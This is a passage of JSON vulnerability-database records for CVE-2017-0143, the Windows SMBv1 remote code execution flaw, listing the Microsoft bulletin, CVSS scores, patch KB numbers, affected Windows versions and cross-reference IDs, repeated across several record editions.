"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:47:20", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T00:46:29", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012214", "KB4012212", "KB3210720", "KB4013198", "KB3212646", "KB3177186", "KB4012216", "KB3205401", "KB4013429", "KB4012213", "KB3205409", "KB4012598", "KB4012606", "KB4012217", "KB3213986", "KB4012215", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:46:29", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T04:50:53", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012216", "KB4012212", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3210721", "KB4013198", "KB4012214", "KB4012217", "KB4012598", "KB4013429", "KB3210720", "KB4012213", "KB3205409", "KB3177186", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": 